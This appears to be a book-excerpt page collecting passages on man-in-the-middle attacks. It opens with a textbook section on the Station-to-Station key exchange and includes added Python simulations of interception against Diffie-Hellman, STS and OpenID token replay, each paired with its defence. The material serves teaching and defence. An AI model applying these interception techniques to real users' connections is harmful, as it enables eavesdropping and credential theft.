This protocol sends an encrypted, signed copy of the exponentials used to evaluate the shared secret key together with the exponentials themselves. This enables the recipients to check the integrity and source of the received information. As in the three-way handshake and similar protocols, the third message confirms to B that the new key K is actually shared with A. These additional features protect the protocol against the simple man-in-the-middle attack shown in Figure 6.14. However, users of the protocol should still take care, as you will see if you try to solve Exercise 6.9. You should never underestimate the difficulty of designing a correct and secure key exchange protocol!

6.6 Non-cryptographic Methods

Not all forms of security can be provided solely by the use of cryptographic methods. Some other – rather obvious – techniques are: Traffic padding used to produce a constant flow of traffic between users of a service so that information about traffic flow cannot be used to deduce the level of activity of the users.

When certificates are used to provide authentication, it is important that a certificate can be revoked if it is no longer valid – for example, if the key which it contains is known to be compromised, or if the owner of the certificate ceases to exist. Suggest a suitable protocol for dealing with revocation in the case of a system with multiple certification authorities, based on an hierarchical trust model.

6.9. The Station-to-Station protocol given as Protocol 26 is sensitive to a type of man-in-the-middle attack in which the attacker changes the first message from A to B, so that it looks as though it came from a third party, C. (Technically, this can be done by changing the sender address in the PDU.) B then replies to the intruder, who sends the reply on to A. When A sends its third message, it believes that it is talking to B, whereas B believes it is talking to C. Suggest ways of avoiding this type of attack.
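The attack of Figure 6.14 and the three messages of Protocol 26, written out with both sides' computations, as an added Python example; it is not code from Sharp's book. The public parameters are toy values ($q = 23$, $\alpha = 5$, a primitive root of order 22) so the arithmetic stays readable; $S_i$ is a Schnorr signature in the same group and $\{m\}_K$ is a SHA-256 keystream XOR, both standing in for the real signature scheme and cipher a deployment would use with a standard 2048-bit or larger group. The exponents passed to the functions are chosen, not random, so that the runs are reproducible.

```python
import hashlib
import secrets

Q, ALPHA, ORDER = 23, 5, 22          # toy public parameters: prime q, primitive root, its order


def H(*ints):
    """SHA-256 over fixed-width encodings of the arguments, as a 256-bit integer."""
    data = b"".join(i.to_bytes(32, "big") for i in ints)
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def keygen():
    """Long-term signing key pair (x, alpha^x) for one party."""
    x = secrets.randbelow(ORDER - 1) + 1
    return x, pow(ALPHA, x, Q)


def sign(x, *msg):                   # S_i(msg): Schnorr signature (e, s)
    k = secrets.randbelow(ORDER - 1) + 1
    r = pow(ALPHA, k, Q)
    e = H(r, *msg)
    return e, (k + x * e) % ORDER


def verify(y, sig, *msg):
    e, s = sig
    r = pow(ALPHA, s, Q) * pow(y, (-e) % ORDER, Q) % Q   # alpha^s * y^-e = alpha^k
    return H(r, *msg) == e


def crypt(K, data):                  # {data}_K: XOR with a keystream derived from K (symmetric)
    stream = b"".join(hashlib.sha256(K.to_bytes(32, "big") + bytes([i])).digest() for i in range(2))
    return bytes(a ^ b for a, b in zip(data, stream))


def pack(sig):
    return sig[0].to_bytes(32, "big") + sig[1].to_bytes(32, "big")


def unpack(b):
    return int.from_bytes(b[:32], "big"), int.from_bytes(b[32:], "big")


def plain_dh(xA, xB, xM):
    """Fig. 6.14(b): M substitutes alpha^xM in both directions of an unsigned exchange."""
    KA = pow(pow(ALPHA, xM, Q), xA, Q)            # what A computes, believing it came from B
    KB = pow(pow(ALPHA, xM, Q), xB, Q)            # what B computes, believing it came from A
    M_knows = (pow(pow(ALPHA, xA, Q), xM, Q), pow(pow(ALPHA, xB, Q), xM, Q))
    return KA, KB, M_knows


def sts(xA, xB, xM=None):
    """Protocol 26. With xM set, M replaces Message 1 by alpha^xM and relays the rest.
    Returns (A accepted, B accepted)."""
    skA, pkA = keygen()
    skB, pkB = keygen()                           # public keys known to both parties beforehand
    gA = pow(ALPHA, xA, Q)
    # Message 1: A -> B : alpha^xA        (M substitutes alpha^xM when attacking)
    gA_seen_by_B = pow(ALPHA, xM, Q) if xM is not None else gA
    gB = pow(ALPHA, xB, Q)
    KB = pow(gA_seen_by_B, xB, Q)
    # Message 2: B -> A : (alpha^xB, {S_B(alpha^xB, alpha^xA')}_K)
    msg2 = (gB, crypt(KB, pack(sign(skB, gB, gA_seen_by_B))))
    KA = pow(msg2[0], xA, Q)
    # A demands a signature by B over the exponential it received and the one it sent
    a_ok = verify(pkB, unpack(crypt(KA, msg2[1])), msg2[0], gA)
    if not a_ok:
        return False, False                       # A aborts; Message 3 is never sent
    # Message 3: A -> B : {S_A(alpha^xB, alpha^xA)}_K
    msg3 = crypt(KA, pack(sign(skA, gB, gA)))
    b_ok = verify(pkA, unpack(crypt(KB, msg3)), gB, gA_seen_by_B)
    return a_ok, b_ok


if __name__ == "__main__":
    KA, KB, seen = plain_dh(3, 7, 10)
    print("plain DH under attack: M knows A's key", seen[0] == KA, "and B's key", seen[1] == KB)
    print("STS normal run:", sts(3, 7))
    print("STS with M substituting Message 1:", sts(3, 7, xM=10))
```

Note what the signature covers: only the two exponentials. M cannot make B's signature say "$\alpha^{x_A}$" when B actually received $\alpha^{x_M}$, which is why the substitution fails, but nothing in the signed data names who A and B think they are talking to. That is the gap Exercise 6.9 probes with a re-addressed Message 1, and the usual remedies bind the parties' identities into what gets signed.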


pages: 2,054 words: 359,149

The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities by Justin Schuh

Albert Einstein, Any sufficiently advanced technology is indistinguishable from magic, bash_history, business process, database schema, Debian, defense in depth, en.wikipedia.org, Firefox, information retrieval, iterative process, loose coupling, MITM: man-in-the-middle, MVC pattern, RFC: Request For Comment, slashdot, web application

Key Exchange Algorithms Key exchange protocols can get complicated, so this section just provides some simple points to keep in mind. First, the implementation should use a standard key exchange protocol, such as RSA, Diffie-Hellman, or El Gamal. These algorithms have been extensively validated and provide the best degree of assurance. The next concern is that the key exchange is performed in a secure manner, which means both sides of the communication must provide some means of identification to prevent man-in-the-middle attacks. All the key exchange algorithms mentioned previously provide associated signature algorithms that can be used to validate both sides of the connection. These algorithms require that both parties have already exchanged public keys or that they are available through some trusted source, such as a Public Key Infrastructure (PKI) server. Common Vulnerabilities of Encryption Now that you have some background on the proper use of encryption, it’s important to understand what can go wrong.

If that same site is on the public Internet with a developer-signed certificate, however, it’s no longer realistic to assume you can get that certificate to all potential clients. The client, therefore, has no way of knowing whether the certificate can be trusted. If users browse to the site, they get an error message stating that the certificate isn’t signed by a trusted authority; the only option is to accept the untrusted certificate or terminate the connection. An attacker capable of spoofing the server could exploit this situation to stage man-in-the-middle attacks and then hijack sessions or steal credentials. Network Profiles An application’s network profile is a crucial consideration when you’re reviewing operational security. Protocols such as Network File System (NFS) and Server Message Block (SMB) are acceptable inside the corporate firewall and generally are an absolute necessity. However, these same types of protocols become an unacceptable liability when they are exposed outside the firewall.

Therefore, you need to see whether there’s any way to break that encryption. In performing an audit, often you assume the effectiveness of a publicly validated encryption protocol. However, that doesn’t necessarily mean the protocol is being used safely. You might want to look at session establishment and see whether an observer can learn secret keys from watching a proposal and session setup. Man in the middle—Can an observer masquerade as a server and glean login credentials from clients without their knowledge? Protocol quirks—What interesting quirks does the protocol allow? For example, does it provide backward compatibility with previous, less secure versions of the protocol? If so, undermining security by forcing the use of old protocol features or authentication mechanisms might be possible.


Smart Grid Standards by Takuro Sato

business cycle, business process, carbon footprint, clean water, cloud computing, data acquisition, decarbonisation, demand response, distributed generation, energy security, factory automation, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Iridium satellite, iterative process, knowledge economy, life extension, linear programming, low earth orbit, market design, MITM: man-in-the-middle, off grid, oil shale / tar sands, packet switching, performance metric, RFC: Request For Comment, RFID, smart cities, smart grid, smart meter, smart transportation, Thomas Davenport

The goal of the attacker is to decrease the availability of the system for its intended purpose.
• Eavesdropping: The goal of the attacker is to violate the confidentiality of the communication, for example, by sniffing packets on the local area network (LAN) or by intercepting wireless transmissions.
• Man-in-the-middle attack: In a man-in-the-middle attack, the attacker acts toward both end points of the communication as if the attacker was the expected, legitimate partner. In addition to confidentiality violations, this also allows modifying the exchanged messages (integrity). Via man-in-the-middle attacks, weaknesses in the implementation or usage of certain key exchange and authentication protocols can be exploited to gain control even over encrypted sessions.
• Virus: A virus-based attack manipulates a legitimate user to bypass authentication and access control mechanisms in order to execute the malicious code injected by the attacker.



pages: 302 words: 82,233

Beautiful security by Andy Oram, John Viega

Albert Einstein, Amazon Web Services, business intelligence, business process, call centre, cloud computing, corporate governance, credit crunch, crowdsourcing, defense in depth, Donald Davies, en.wikipedia.org, fault tolerance, Firefox, loose coupling, Marc Andreessen, market design, MITM: man-in-the-middle, Monroe Doctrine, new economy, Nicholas Carr, Nick Leeson, Norbert Wiener, optical character recognition, packet switching, peer-to-peer, performance metric, pirate software, Robert Bork, Search for Extraterrestrial Intelligence, security theater, SETI@home, Silicon Valley, Skype, software as a service, statistical model, Steven Levy, The Wisdom of Crowds, Upton Sinclair, web application, web of trust, zero day, Zimmermann PGP

Remember the security warning that popped up about the certificate? The warning popped up because any traffic being encrypted was actually being decrypted at my laptop, not at the final destination as the user assumes. In other words, they’re running a secure, encrypted connection just as they want—except the encryption is using my certificate and I can trivially decrypt the data again. As the man in the middle, I can decrypt users’ data, record everything, and then reencrypt it and pass it along to its final destination. I could record usernames, passwords, email messages, and other potentially confidential information that the victim assumed was being passed securely to a trusted destination. Even a small slice of your personal networking traffic can open a chink for serious identity attacks. Say, for example, that I gain access only to your email account.

However, they have never been trained professionally about the Internet and its risks, nor do they work for a corporation that has engineers dedicated to making sure employees understand what all the security warnings mean. Instead they have felt their way through the process and have just enough knowledge to pay their bills online and check their stock portfolio. Something like a digital certificate makes about as much sense to them as a proton accelerator. On the other hand, I find technically savvy people who have a comprehensive understanding not only of digital certificates but also of man-in-the-middle attacks. One might think these people would never fall for such a scam, but on the contrary, I have found that even these people are quick to fall victim. The reason is that—unlike my parents, who don’t understand anything—the experts understand it so well that they rationalize what is taking place. For example, when the security alert pops up their first assumption is that the administrator for the WiFly site has dropped the ball and didn’t renew her expired certificate.


pages: 525 words: 116,295

The New Digital Age: Transforming Nations, Businesses, and Our Lives by Eric Schmidt, Jared Cohen

access to a mobile phone, additive manufacturing, airport security, Amazon Mechanical Turk, Amazon Web Services, anti-communist, augmented reality, Ayatollah Khomeini, barriers to entry, bitcoin, borderless world, call centre, Chelsea Manning, citizen journalism, clean water, cloud computing, crowdsourcing, data acquisition, Dean Kamen, drone strike, Elon Musk, failed state, fear of failure, Filter Bubble, Google Earth, Google Glasses, hive mind, income inequality, information trail, invention of the printing press, job automation, John Markoff, Julian Assange, Khan Academy, Kickstarter, knowledge economy, Law of Accelerating Returns, market fundamentalism, means of production, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, Nelson Mandela, offshore financial centre, Parag Khanna, peer-to-peer, peer-to-peer lending, personalized medicine, Peter Singer: altruism, Ray Kurzweil, RFID, Robert Bork, self-driving car, sentiment analysis, Silicon Valley, Skype, Snapchat, social graph, speech recognition, Steve Jobs, Steven Pinker, Stewart Brand, Stuxnet, The Wisdom of Crowds, upwardly mobile, Whole Earth Catalog, WikiLeaks, young professional, zero day

One of the most insidious forms of cyber attack that P2P users can encounter is known as a “man-in-the-middle” attack, a form of active eavesdropping. In this situation a third-party attacker inserts himself between two participants in a conversation and automatically relays messages between them, without either participant realizing it. This third party acts like an invisible intermediary, having tricked each participant into believing that the attacker is actually the other party of the conversation. So as the conversation occurs (whether through text, voice or video), that third-party attacker can sit back and watch, occasionally siphoning off information and storing it elsewhere. (Or, more maliciously, the attacker could insert false information into the conversation.) Man-in-the-middle attacks occur in all protocols, not just peer-to-peer, yet they seem all the more malicious in P2P communications simply because people using those platforms believe they are secure.


pages: 812 words: 180,057

The Generals: American Military Command From World War II to Today by Thomas E. Ricks

affirmative action, airport security, amateurs talk tactics, professionals talk logistics, Charles Lindbergh, Columbine, continuation of politics by other means, cuban missile crisis, hiring and firing, MITM: man-in-the-middle, RAND corporation, Ronald Reagan, South China Sea, Yom Kippur War

For those who died following poor leaders There are no bad soldiers, only bad generals. —Saying attributed to Napoleon CONTENTS ALSO BY THOMAS E. RICKS TITLE PAGE COPYRIGHT DEDICATION EPIGRAPH PROLOGUE: Captain William DePuy and the 90th Division in Normandy, summer 1944 PART I WORLD WAR II 1. General George C. Marshall: The leader 2. Dwight Eisenhower: How the Marshall system worked 3. George Patton: The specialist 4. Mark Clark: The man in the middle 5. “Terrible Terry” Allen: Conflict between Marshall and his protégés 6. Eisenhower manages Montgomery 7. Douglas MacArthur: The general as presidential aspirant 8. William Simpson: The Marshall system and the new model American general PART II THE KOREAN WAR 9. William Dean and Douglas MacArthur: Two generals self-destruct 10. Army generals fail at Chosin 11. O. P. Smith succeeds at Chosin 12.

Narrow as that mission is, it was precisely the job the American military faced in Europe in late 1944 and early 1945, and that is likely the primary reason Patton was never sent home in disgrace. On balance, Eisenhower was right to keep him. And the modern American military probably is worse for not having a few senior commanders with a dose of Patton’s dynamism and color in them. CHAPTER 4 Mark Clark The man in the middle Like Patton, Lt. Gen. Mark Clark was close to Eisenhower, but he was far less effective on the battlefield. Clark was also a difficult man to like. “It makes my flesh creep to be with him,” Patton once wrote in his diary. Ten months later Patton noted that “anyone who serves under Clark is always in danger.” As the American commander in the secondary theater of Italy in 1943 and 1944, Clark fired two corps commanders—that is, generals overseeing groups of divisions.

When the war began, it had been Patton: Eisenhower, At Ease, 237; Blumenson, Patton Papers, 15. “Hell, get on to yourself, Ike”: Blumenson, Patton Papers, 432. Patton also told Eisenhower: Blumenson, Patton Papers, 55, 168. “He is the most modern general”: Blumenson, Patton Papers, 654. See also B. H. Liddell Hart, The German Generals Talk (Berkley, 1958), 215. “a master of fast” . . . “United States Army has known”: Eisenhower, At Ease, 172–73. 4. MARK CLARK: THE MAN IN THE MIDDLE “It makes my flesh creep” . . . “Clark is always in danger”: Blumenson, Patton Papers, 157, 361. the assault was a “near disaster”: General Mark W. Clark, Calculated Risk (Enigma, 2007), 152. “Mark, leave enough ammunition”: Frank James Price, Troy H. Middleton: A Biography (Louisiana State University Press, 1974), 169. British Gen. Harold Alexander: Rick Atkinson, The Day of Battle: The War in Sicily and Italy, 1943–1944 (Henry Holt, 2007), 231.


pages: 91 words: 18,831

Getting Started With OAuth 2.0 by Ryan Boyd

MITM: man-in-the-middle, social graph, web application

There are two main types of replay attacks we wish to prevent: An attacker capturing a user’s OAuth credentials as they log in to a site and using them later on the same site. A rogue application developer using the OAuth token a user was issued to log in to their malicious app in order to impersonate the user on a different legitimate app. The OAuth 2.0 specification requires the OAuth endpoint and APIs to be accessed over SSL/TLS to prevent man-in-the-middle attacks, such as the first case. Preventing rogue application developers from replaying legitimate OAuth credentials their app received in order to impersonate one of their users on another app requires a solution specific to OpenID Connect. This solution is the Check ID Endpoint. The Check ID Endpoint is used to verify that the credentials issued by the OAuth provider were issued to the correct application.
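The second replay case, as an added example that is not from the book: a minimal Python model of the check the passage describes, with the provider-side Check ID verification reduced to an HMAC-signed (HS256) ID token and the relying party refusing any token whose audience is not its own client_id. The issuer URL, client identifiers, signing key and token layout are assumptions made for a self-contained example; a current deployment would validate the ID token against the provider's published keys under the final OpenID Connect rules rather than call the draft-era Check ID endpoint, but the audience check is the same.

```python
import base64
import hashlib
import hmac
import json
from typing import Dict, Optional

# Constructed scenario: one identity provider and two relying-party apps. The provider's
# HMAC key, issuer URL and client identifiers are assumptions made for the example.
PROVIDER_KEY = b"demo-provider-signing-key"
ISSUER = "https://idp.example"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_json(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":"), sort_keys=True).encode())


def issue_id_token(subject: str, client_id: str, now: int, lifetime: int = 300) -> str:
    """Provider side: mint an HS256 ID token whose audience is the requesting client."""
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {"iss": ISSUER, "sub": subject, "aud": client_id, "iat": now, "exp": now + lifetime}
    signing_input = _encode_json(header) + "." + _encode_json(claims)
    tag = hmac.new(PROVIDER_KEY, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(tag)


def check_id(id_token: str) -> dict:
    """Model of the provider's Check ID endpoint: verify the signature, return the claims.

    Only the provider holds PROVIDER_KEY, so a relying party that wants trustworthy claims
    has to ask the provider (the real endpoint) rather than read the token's own contents.
    """
    parts = id_token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, claims_b64, tag_b64 = parts
    expected = hmac.new(PROVIDER_KEY, f"{header_b64}.{claims_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(tag_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(claims_b64))


def accept_login(id_token: str, my_client_id: str, now: int) -> Optional[str]:
    """Relying party: return the authenticated subject, or None if the token must be rejected."""
    try:
        claims = check_id(id_token)
    except ValueError:
        return None
    if claims.get("iss") != ISSUER:
        return None
    if claims.get("aud") != my_client_id:
        # The token was issued to a different application. Accepting it would let that
        # application's developer log in here as the user: the second replay case.
        return None
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None
    return claims["sub"]


def replay_scenario(now: int) -> Dict[str, Optional[str]]:
    """A rogue app gets a legitimate token for itself and tries to reuse it elsewhere."""
    token_for_rogue = issue_id_token("alice", "rogue-app", now)
    # Forgery attempt: rewrite the audience but keep the old signature.
    header_b64, _, tag_b64 = token_for_rogue.split(".")
    forged_claims = {**check_id(token_for_rogue), "aud": "bank-app"}
    forged = header_b64 + "." + _encode_json(forged_claims) + "." + tag_b64
    return {
        "rogue_app": accept_login(token_for_rogue, "rogue-app", now),  # legitimate use
        "bank_app": accept_login(token_for_rogue, "bank-app", now),    # replay: wrong audience
        "forged_aud": accept_login(forged, "bank-app", now),           # tampering: bad signature
    }
```

The point of `check_id` living on the provider's side is that the relying party never has the verification key; what it does hold, and must compare, is its own client_id against the `aud` claim the provider hands back.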


pages: 470 words: 144,455

Secrets and Lies: Digital Security in a Networked World by Bruce Schneier

Ayatollah Khomeini, barriers to entry, business process, butterfly effect, cashless society, Columbine, defense in depth, double entry bookkeeping, fault tolerance, game design, IFF: identification friend or foe, John von Neumann, knapsack problem, MITM: man-in-the-middle, moral panic, mutually assured destruction, pez dispenser, pirate software, profit motive, Richard Feynman, risk tolerance, Silicon Valley, Simon Singh, slashdot, statistical model, Steve Ballmer, Steven Levy, the payments system, Y2K, Yogi Berra

One powerful attack is the man-in-the-middle attack. Alice wants to talk securely with Bob, using some public-key algorithm to establish a key. Eve, the eavesdropper, intercepts Alice’s communication. She pretends to be someone named Bob to Alice, completing the key-exchange protocol. Then she contacts Bob and pretends to be Alice, completing a second key-exchange protocol with Bob. Now she can eavesdrop on the communications. When Alice sends a message to Bob, Eve intercepts it, decrypts it, re-encrypts it, and sends it on to Bob. When Bob sends a message to Alice, Eve performs a similar procedure. This is a powerful attack. Of course, good protocol designers take these attacks into account and try to prevent them. Better communications protocols don’t permit man-in-the-middle attacks, and certainly don’t allow eavesdropping of passwords.

The cryptography software hashes that passphrase to obtain a secret key, and then uses a symmetric algorithm to encrypt the data file. The result is a file that can only be accessed by Alice, or someone else who knows the password. Want to build a secure telephone? Use public-key cryptography to generate a random session key, and then use symmetric cryptography and that session key to encrypt the conversation. A hash function provides added security against man-in-the-middle attacks. (More about those later.) To secure e-mail, use public-key cryptography for privacy and digital signature schemes for authentication. Electronic commerce? Usually nothing more than digital signatures and sometimes encryption for privacy. A secure audit log: combine a hash function, encryption, maybe a MAC, and stir. What we’re doing here is building protocols. A protocol is nothing more than a dance.
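The two-exchange relay Schneier describes, which is also the attack Schmidt and Cohen summarize earlier on this page, as an added example that is not from either book: a toy Diffie-Hellman key exchange in Python's standard library, with Eve completing one exchange with each side and relaying plaintext, followed by two of the countermeasures the passages point at: a MAC over the exchanged public values under a key the parties already share (standing in for the signatures a real protocol would use), and a short authentication string derived by hashing the session key, the hash-based check a secure telephone has its two users compare over the voice channel. The group (p = 2^127 − 1, g = 3), the SHA-256 counter-mode stream cipher and the pre-shared authentication key are assumptions made for a self-contained example, not anything from the text.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

# Toy Diffie-Hellman group (assumption for the example): the Mersenne prime 2^127 - 1 and
# generator 3. Real protocols use a standardized group of 2048 bits or more; this one is
# small enough to read and fast enough to run, and its size is irrelevant to the attack.
P = (1 << 127) - 1
G = 3


def dh_keypair() -> Tuple[int, int]:
    """Return (private exponent, public value g^x mod p)."""
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def dh_shared(priv: int, other_pub: int) -> bytes:
    """Derive a 32-byte session key by hashing the shared group element."""
    return hashlib.sha256(pow(other_pub, priv, P).to_bytes(16, "big")).digest()


def _keystream(key: bytes, n: int) -> bytes:
    # Toy stream cipher (assumption): SHA-256 in counter mode. Confidentiality only,
    # no integrity, and each key is used for exactly one message here.
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def encrypt(key: bytes, msg: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(msg, _keystream(key, len(msg))))


decrypt = encrypt  # XOR stream cipher: the same operation in both directions


def short_auth_string(session_key: bytes, digits: int = 4) -> str:
    """Hash-derived check value the two users compare out of band (e.g. read aloud)."""
    h = hashlib.sha256(b"sas" + session_key).digest()
    return str(int.from_bytes(h[:4], "big") % 10 ** digits).zfill(digits)


def unauthenticated_exchange(message: bytes) -> Dict[str, object]:
    """Alice and Bob run plain DH; Eve swaps in her own public values on both legs."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    e_a_priv, e_a_pub = dh_keypair()  # Eve's key pair facing Alice
    e_b_priv, e_b_pub = dh_keypair()  # Eve's key pair facing Bob

    k_alice = dh_shared(a_priv, e_a_pub)   # Alice believes e_a_pub came from Bob
    k_eve_a = dh_shared(e_a_priv, a_pub)   # ... so Eve shares this key with Alice
    k_bob = dh_shared(b_priv, e_b_pub)     # Bob believes e_b_pub came from Alice
    k_eve_b = dh_shared(e_b_priv, b_pub)   # ... and Eve shares this one with Bob

    ciphertext = encrypt(k_alice, message)
    eve_reads = decrypt(k_eve_a, ciphertext)   # intercept and decrypt
    relayed = encrypt(k_eve_b, eve_reads)      # re-encrypt toward Bob
    return {
        "eve_reads": eve_reads,
        "bob_reads": decrypt(k_bob, relayed),
        "keys_equal": k_alice == k_bob,        # False: there are two sessions, not one
        "sas_alice": short_auth_string(k_alice),
        "sas_bob": short_auth_string(k_bob),   # differs from Alice's with overwhelming odds
    }


def honest_sas_match() -> bool:
    """Without Eve both sides derive the same key, so their check strings agree."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    return short_auth_string(dh_shared(a_priv, b_pub)) == short_auth_string(dh_shared(b_priv, a_pub))


def transcript_tag(auth_key: bytes, alice_pub: int, bob_pub: int) -> bytes:
    """MAC over the exchanged public values; stands in for a signature in a real protocol."""
    data = alice_pub.to_bytes(16, "big") + bob_pub.to_bytes(16, "big")
    return hmac.new(auth_key, data, hashlib.sha256).digest()


def authenticated_exchange(auth_key: bytes, mitm: bool) -> bool:
    """Return True if Bob accepts Alice's tag over the transcript as Bob saw it."""
    _, a_pub = dh_keypair()
    _, b_pub = dh_keypair()
    if mitm:
        _, e_a_pub = dh_keypair()
        _, e_b_pub = dh_keypair()
        alice_sees, bob_sees = e_a_pub, e_b_pub   # Eve's values replace the real ones
    else:
        alice_sees, bob_sees = b_pub, a_pub
    tag_from_alice = transcript_tag(auth_key, a_pub, alice_sees)
    # Eve can forward the tag but, lacking auth_key, cannot recompute it over the values
    # Bob actually received, so Bob's check fails whenever the two transcripts differ.
    return hmac.compare_digest(tag_from_alice, transcript_tag(auth_key, bob_sees, b_pub))
```

Both defences work because they bind something Eve cannot control: the MAC binds the public values to a secret she lacks, and the short authentication string binds the session key to a channel (the users' voices) she cannot rewrite in real time. An attacker who can forge either one has already broken the trust anchor, not the key exchange.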


Mastering Blockchain, Second Edition by Imran Bashir

3D printing, altcoin, augmented reality, autonomous vehicles, bitcoin, blockchain, business process, carbon footprint, centralized clearinghouse, cloud computing, connected car, cryptocurrency, data acquisition, Debian, disintermediation, disruptive innovation, distributed ledger, domain-specific language, en.wikipedia.org, Ethereum, ethereum blockchain, fault tolerance, fiat currency, Firefox, full stack developer, general-purpose programming language, gravity well, interest rate swap, Internet of things, litecoin, loose coupling, MITM: man-in-the-middle, MVC pattern, Network effects, new economy, node package manager, Oculus Rift, peer-to-peer, platform as a service, prediction markets, QR code, RAND corporation, Real Time Gross Settlement, reversible computing, RFC: Request For Comment, RFID, ride hailing / ride sharing, Satoshi Nakamoto, single page application, smart cities, smart contracts, smart grid, smart meter, supply-chain management, transaction costs, Turing complete, Turing machine, web application, x509 certificate

Most notably, BIP 70 (Payment Protocol) describes the protocol for secure communication between a merchant and customers. This protocol uses X.509 certificates for authentication and runs over HTTP and HTTPS. There are three messages in this protocol: PaymentRequest, Payment, and PaymentACK. The key features of this proposal are defense against man-in-the-middle attacks and secure proof of payment. Man-in-the-middle attacks can result in a scenario where the attacker is sitting between the merchant and the buyer and it would seem to the buyer that they are talking to the merchant, but in fact, the man in the middle is interacting with the buyer instead of the merchant. This can result in manipulation of the merchant's Bitcoin address to defraud the buyer. Several other BIPs, such as BIP 71 (Payment Protocol MIME types) and BIP 72 (URI extensions for Payment Protocol), have also been implemented to standardize the payment scheme in support of BIP 70 (Payment Protocol).


pages: 562 words: 153,825

Dark Mirror: Edward Snowden and the Surveillance State by Barton Gellman

4chan, A Declaration of the Independence of Cyberspace, active measures, Anton Chekhov, bitcoin, Cass Sunstein, cloud computing, corporate governance, crowdsourcing, data acquisition, Debian, desegregation, Donald Trump, Edward Snowden, financial independence, Firefox, GnuPG, Google Hangouts, informal economy, Jacob Appelbaum, job automation, Julian Assange, MITM: man-in-the-middle, national security letter, planetary scale, private military company, ransomware, Robert Gordon, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Saturday Night Live, Silicon Valley, Skype, social graph, standardized shipping container, Steven Levy, telepresence, undersea cable, web of trust, WikiLeaks, zero day, Zimmermann PGP

tunnel just about anywhere: Even overseas, the NSA may not target a U.S. person for surveillance without a warrant from the FISA Court, but that does not stop it from tapping the infrastructure of U.S. companies. (See chapter 8.) By agreement, with few exceptions, the NSA also restrains itself from clandestine surveillance in Canada, the United Kingdom, Australia, and New Zealand—the other four members of the Five Eyes intelligence partnership. Undisclosed operations inside other allied countries are regarded as risky but not out of bounds.

man in the middle: In a man-in-the-middle attack, the NSA places or takes control of equipment directly in the path of digital traffic from one server to another. This enables the agency to read—and alter, for example by injecting malware—the data flow between source and destination.

man on the side: A man-on-the-side attack gives the NSA access to but not control of equipment, such as a router or switch, that stands between the source and destination of digital traffic.

The companies are compensated for their trouble from a classified budget for “corporate partners” that reached $394 million in fiscal year 2011. When the NSA cannot negotiate access, it helps itself. Overseas, where domestic legal restrictions do not apply, the acquisitions directorate, S3, is free to tunnel just about anywhere it likes. A worldwide hacking infrastructure called QUANTUM deploys a broad range of tools to inject software exploits, intercept communications with methods known as man in the middle and man on the side, and reroute calls and emails through NSA collection points. Most of these are known as passive operations because they collect electronic signals automatically as they pass through large trunk lines and junctions. When passive methods do not suffice, the job becomes, in NSA parlance, interactive. During one representative week in April 2012, there were 2,588 such interactive missions.


pages: 134 words: 29,488

Python Requests Essentials by Rakesh Vidya Chandra, Bala Subrahmanyam Varanasi

create, read, update, delete, en.wikipedia.org, Kickstarter, MITM: man-in-the-middle, MVC pattern, natural language processing, RFC: Request For Comment, RFID, supply-chain management, web application

Browser: GET Default.htm
Server: 401 Access Denied, WWW-Authenticate: Digest nonce="XXXXX"
Browser: GET Default.htm, Authorization: Digest nonce="XXXXX", response="YYYY"
Server: returns Default.htm with a 200 status

This type of authentication gains more strength, as the password in this scheme is not used in the form of plain text. The cracking of the password hashes becomes difficult in digest authentication with the use of a nonce, which counters chosen plain text attacks. Even though Digest authentication overcomes most of the drawbacks of Basic authentication, it does have some disadvantages. This scheme of authentication is vulnerable to man-in-the-middle attacks. It reduces the flexibility of storing the password in the password database, as all well designed password databases use other encryption methods to store them.

Using Digest authentication with Requests

Using Digest authentication with requests is very simple. Let us see how it's done:

>>> from requests.auth import HTTPDigestAuth
>>> requests.get('https://demo.example.com/resource/path', auth=HTTPDigestAuth('user-ID', 'password'))

In the preceding lines of code, we carried out digest authentication by creating an HTTPDigestAuth object and setting it to the 'auth' parameter, which will be submitted to the server.


pages: 390 words: 96,624

Consent of the Networked: The Worldwide Struggle for Internet Freedom by Rebecca MacKinnon

A Declaration of the Independence of Cyberspace, Bay Area Rapid Transit, Berlin Wall, business cycle, business intelligence, Cass Sunstein, Chelsea Manning, citizen journalism, cloud computing, cognitive dissonance, collective bargaining, conceptual framework, corporate social responsibility, Deng Xiaoping, digital Maoism, don't be evil, Filter Bubble, Firefox, future of journalism, illegal immigration, Jaron Lanier, Jeff Bezos, John Markoff, Joi Ito, Julian Assange, Mark Zuckerberg, Mikhail Gorbachev, MITM: man-in-the-middle, national security letter, online collectivism, Panopticon Jeremy Bentham, Parag Khanna, pre–internet, race to the bottom, Richard Stallman, Ronald Reagan, sharing economy, Silicon Valley, Silicon Valley startup, Skype, Steve Crocker, Steven Levy, WikiLeaks

